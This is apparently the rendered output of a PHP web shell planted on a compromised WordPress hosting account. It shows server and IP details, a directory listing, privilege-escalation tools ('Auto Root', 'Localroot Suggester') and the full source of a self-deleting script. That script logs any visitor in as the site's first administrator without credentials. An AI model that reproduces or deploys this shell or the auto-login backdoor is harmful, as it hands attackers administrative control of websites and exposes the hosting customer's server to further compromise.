Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.208
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
dustinhy /
griefdriventohearthealing.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2021-07-17 20:17
cgi-bin
[ DIR ]
drwxr-xr-x
2021-07-17 20:16
wp-admin
[ DIR ]
drwxr-xr-x
2026-05-21 09:43
wp-content
[ DIR ]
drwxr-xr-x
2026-07-14 09:41
wp-includes
[ DIR ]
drwxr-xr-x
2026-05-21 09:43
.htaccess
1.14
KB
-rw-r--r--
2026-01-30 06:29
Default.html
88.08
KB
-rw-r--r--
2021-04-27 02:20
about.php
3.73
KB
-rw-r--r--
2026-01-30 06:26
index.php
405
B
-rw-r--r--
2026-07-10 09:43
license.txt
19.44
KB
-rw-r--r--
2026-07-10 09:43
mah.php
3.69
KB
-rw-r--r--
2026-01-30 06:28
readme.html
7.23
KB
-rw-r--r--
2026-07-10 09:43
wp-activate.php
7.2
KB
-rw-r--r--
2026-05-21 09:43
wp-blog-header.php
351
B
-rw-r--r--
2021-04-27 02:21
wp-comments-post.php
2.27
KB
-rw-r--r--
2025-02-06 07:43
wp-config-sample.php
3.26
KB
-rw-r--r--
2025-12-03 10:44
wp-config.php
2.81
KB
-rw-r--r--
2021-07-17 21:03
wp-cron.php
5.49
KB
-rw-r--r--
2025-02-06 07:43
wp-links-opml.php
2.43
KB
-rw-r--r--
2025-12-03 10:44
wp-load.php
3.84
KB
-rw-r--r--
2025-02-06 07:43
wp-login.php
50.63
KB
-rw-r--r--
2026-05-21 09:43
wp-mail.php
8.52
KB
-rw-r--r--
2025-12-03 10:44
wp-settings.php
31.88
KB
-rw-r--r--
2026-05-21 09:43
wp-signup.php
33.81
KB
-rw-r--r--
2026-05-21 09:43
wp-trackback.php
5.09
KB
-rw-r--r--
2025-12-03 10:44
wp_auto_login_186f67d8a16b94df213bad4b11944608.php
1.61
KB
-rw-r--r--
2021-04-27 02:28
xmlrpc.php
3.13
KB
-rw-r--r--
2025-04-16 09:46
Save
Rename
<?php // // Automatically login a single WordPress user upon arrival to main page. // function auto_login() { if (!is_user_logged_in()) { // Admin user_id $admins = get_users(array('role'=>'administrator')); $user_id = $admins[0]->ID; $user = get_user_by( 'ID', $user_id ); if ( !$user ) { error_log("wp_auto_login: user_id==1 not found redirecting to admin_url"); $redirect_page = admin_url(); wp_redirect( $redirect_page ); exit(); } $loginusername = $user->user_login; wp_set_current_user($user_id, $loginusername); wp_set_auth_cookie($user_id); do_action('wp_login', $loginusername, $user); // Go to admin area $redirect_page = admin_url(); error_log("wp_auto_login: trying to login user_id==1 loginusername=$loginusername to admin_url=$redirect_page"); wp_redirect( $redirect_page ); exit(); } } // Initialize wordpress define( 'WP_USE_THEMES', true ); $time_since_script_creation = time() - stat(__FILE__)['mtime']; // Delete itself to make sure it is executed only once unlink(__FILE__); if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once( dirname( __FILE__ ) . '/wp-load.php' ); // If the user is already logged in just redirect it to admin area if ( is_user_logged_in() ) { $redirect_page = admin_url(); wp_redirect( $redirect_page ); exit(); } // Avalon auto-login // If script is older than 30 minutes, doesn't log in as admin if ($time_since_script_creation < 30 + 60) { auto_login(); } // Set up the WordPress query wp(); // Load the theme template require_once( ABSPATH . WPINC . '/template-loader.php' ); }